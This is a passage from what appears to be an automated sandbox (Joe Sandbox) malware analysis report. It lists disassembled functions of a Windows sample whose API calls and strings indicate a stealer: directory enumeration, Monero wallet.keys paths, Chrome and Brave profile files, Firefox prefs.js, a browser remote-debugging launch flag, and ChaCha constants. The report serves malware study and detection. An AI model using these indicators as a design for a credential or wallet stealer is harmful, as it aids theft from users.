                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: ae04e342b0de08a4e17861be8d67bc8f5a90f4c68cc4cb79929145785f2002aa
                                        • Instruction ID: ced878887e3c6f7ee5082c3223cec2c210ee161f194cccc64949cc66583a95ee
                                        • Opcode Fuzzy Hash: ae04e342b0de08a4e17861be8d67bc8f5a90f4c68cc4cb79929145785f2002aa
                                        • Instruction Fuzzy Hash: 67E0E2B594824956DA1873B6AC06F3B328C5B6920FF04496EFB0896252EA2DF811827D

                                        Non-executed Functions

                                        Function 004EBE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00500B32,00500B2F,00000000,?,?,?,00501450,00500B2E), ref: 004EBEC5
                                        • StrCmpCA.SHLWAPI(?,00501454), ref: 004EBF33
                                        • StrCmpCA.SHLWAPI(?,00501458), ref: 004EBF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EC8A9
                                        • FindClose.KERNEL32(000000FF), ref: 004EC8BB
                                        Strings
                                        • Google Chrome, xrefs: 004EC6F8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC495
                                        • Brave, xrefs: 004EC0E8
                                        • \Brave\Preferences, xrefs: 004EC1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC3B2
                                        • Preferences, xrefs: 004EC104
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC534
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: f3a1806224ebecd6682cc353c93daf4c847ab62edd050bf32c5915f9faf598ce
                                        • Instruction ID: c04c2f83ffc9ca7d942e5593adb9d400821e2a0143f99fbebb3eb067bf2c3872
                                        • Opcode Fuzzy Hash: f3a1806224ebecd6682cc353c93daf4c847ab62edd050bf32c5915f9faf598ce
                                        • Instruction Fuzzy Hash: 825254B290014C5BCB14FB61DD96EFE733DAF44305F40459EB60A66091EE386B58CF6A
                                        Function 004F3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 004F3B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F3B33
                                        • lstrcat.KERNEL32(?,?), ref: 004F3B85
                                        • StrCmpCA.SHLWAPI(?,00500F58), ref: 004F3B97
                                        • StrCmpCA.SHLWAPI(?,00500F5C), ref: 004F3BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F3EB7
                                        • FindClose.KERNEL32(000000FF), ref: 004F3ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: e19a1157067973a31b11ec7c77f8d790aa18338b15cb8cba5b9366873d6dcf99
                                        • Instruction ID: e6ae1bd77531acad72955ebf8b82b62997d6fdd2c425f6dbcb618970a187aa2e
                                        • Opcode Fuzzy Hash: e19a1157067973a31b11ec7c77f8d790aa18338b15cb8cba5b9366873d6dcf99
                                        • Instruction Fuzzy Hash: 7CA11E71A0020C9BDB24DF64DC85FFE7379BB84705F048699B60D96181DB78AB84CF65
                                        Function 004F4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 004F4B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                        • StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                        • StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                        • FindClose.KERNEL32(000000FF), ref: 004F4DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 90a3858b4a05e25cd097cbd8be52bcf9071919a0a955ea6c5b254280817d0380
                                        • Instruction ID: 3e3ce3a695cf97553953a291ad3d42b1377cda8775f22b71744d318983fffbb8
                                        • Opcode Fuzzy Hash: 90a3858b4a05e25cd097cbd8be52bcf9071919a0a955ea6c5b254280817d0380
                                        • Instruction Fuzzy Hash: B661477190421DABCB24EBA4DC45FEE777CBB88701F00868DF60996191EE74AB84CF95
                                        Function 004F47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004F47D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F47D7
                                        • wsprintfA.USER32 ref: 004F47F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F480D
                                        • StrCmpCA.SHLWAPI(?,00500FAC), ref: 004F483B
                                        • StrCmpCA.SHLWAPI(?,00500FB0), ref: 004F4851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F48DB
                                        • FindClose.KERNEL32(000000FF), ref: 004F48F0
                                        • lstrcat.KERNEL32(?,0145E758), ref: 004F4915
                                        • lstrcat.KERNEL32(?,0145DBA0), ref: 004F4928
                                        • lstrlen.KERNEL32(?), ref: 004F4935
                                        • lstrlen.KERNEL32(?), ref: 004F4946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 939984fd271ebc65f613e81f6b1ce0c4403be26da325d80cd6e3383ed777b7cc
                                        • Instruction ID: 0393f1fd1dbdea359b4f7ef1e1e788ca54df5b2e1b874d2bfa03a7e54119a1bd
                                        • Opcode Fuzzy Hash: 939984fd271ebc65f613e81f6b1ce0c4403be26da325d80cd6e3383ed777b7cc
                                        • Instruction Fuzzy Hash: 435157B154421CABCB24EB74DC89FEE777CAB98300F008689B60996190DE789B84CF65
                                        Function 004F40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 004F4113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F412A
                                        • StrCmpCA.SHLWAPI(?,00500F94), ref: 004F4158
                                        • StrCmpCA.SHLWAPI(?,00500F98), ref: 004F416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F42BC
                                        • FindClose.KERNEL32(000000FF), ref: 004F42D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: ad8c4412ce33412f13cbc3b2db448778c657dc21823abc84b89b210211742642
                                        • Instruction ID: 16ec57518e5b7b157e78eba0990677c2335fdbe35370df368e2c2003dd5bde35
                                        • Opcode Fuzzy Hash: ad8c4412ce33412f13cbc3b2db448778c657dc21823abc84b89b210211742642
                                        • Instruction Fuzzy Hash: B45136B190411CABCB24EB60DD45FEA737CBB94304F00869DB61996090DB79AA85CF58
                                        Function 004EEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 004EEE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004EEE55
                                        • StrCmpCA.SHLWAPI(?,00501630), ref: 004EEEAB
                                        • StrCmpCA.SHLWAPI(?,00501634), ref: 004EEEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EF3AE
                                        • FindClose.KERNEL32(000000FF), ref: 004EF3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: b5025b9e1755e40934b6ca22dcc96745e447bf7c94a4a740c9e4bcfefb6c165d
                                        • Instruction ID: e4045313edbef8636934fc5cbdfb2ff8801be125b26db17114bf26f3447b3812
                                        • Opcode Fuzzy Hash: b5025b9e1755e40934b6ca22dcc96745e447bf7c94a4a740c9e4bcfefb6c165d
                                        • Instruction Fuzzy Hash: 6DE132B291111C9ADB14EB61CC66EFE7339AF50304F4045DEB60E62092EF386B99CF59
                                        Function 00520098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 68cf9c4fe141c221cf4d4ff4d5f357fc77331dfa7f59e6dd868f91c46cc70064
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: EFE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        Function 004EF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005016B0,00500D97), ref: 004EF81E
                                        • StrCmpCA.SHLWAPI(?,005016B4), ref: 004EF86F
                                        • StrCmpCA.SHLWAPI(?,005016B8), ref: 004EF885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EFBB1
                                        • FindClose.KERNEL32(000000FF), ref: 004EFBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: f00c3f7e4d4c7db4cc4b679e506939448a493d06646a5316cc1c012cdc0e58c3
                                        • Instruction ID: bc750cafbb92ffdd38e1e78ab40a498d8ebf6643935becd558c2c1fc1c5da353
                                        • Opcode Fuzzy Hash: f00c3f7e4d4c7db4cc4b679e506939448a493d06646a5316cc1c012cdc0e58c3
                                        • Instruction Fuzzy Hash: 43B162B19001089BCB24EF61DD95FFE7379AF54304F0085AEA60E56191EF386B58CB9A
                                        Function 004E1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0050523C,?,?,?,005052E4,?,?,00000000,?,00000000), ref: 004E1963
                                        • StrCmpCA.SHLWAPI(?,0050538C), ref: 004E19B3
                                        • StrCmpCA.SHLWAPI(?,00505434), ref: 004E19C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004E1D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 004E1E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004E1E60
                                        • FindClose.KERNEL32(000000FF), ref: 004E1E72
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
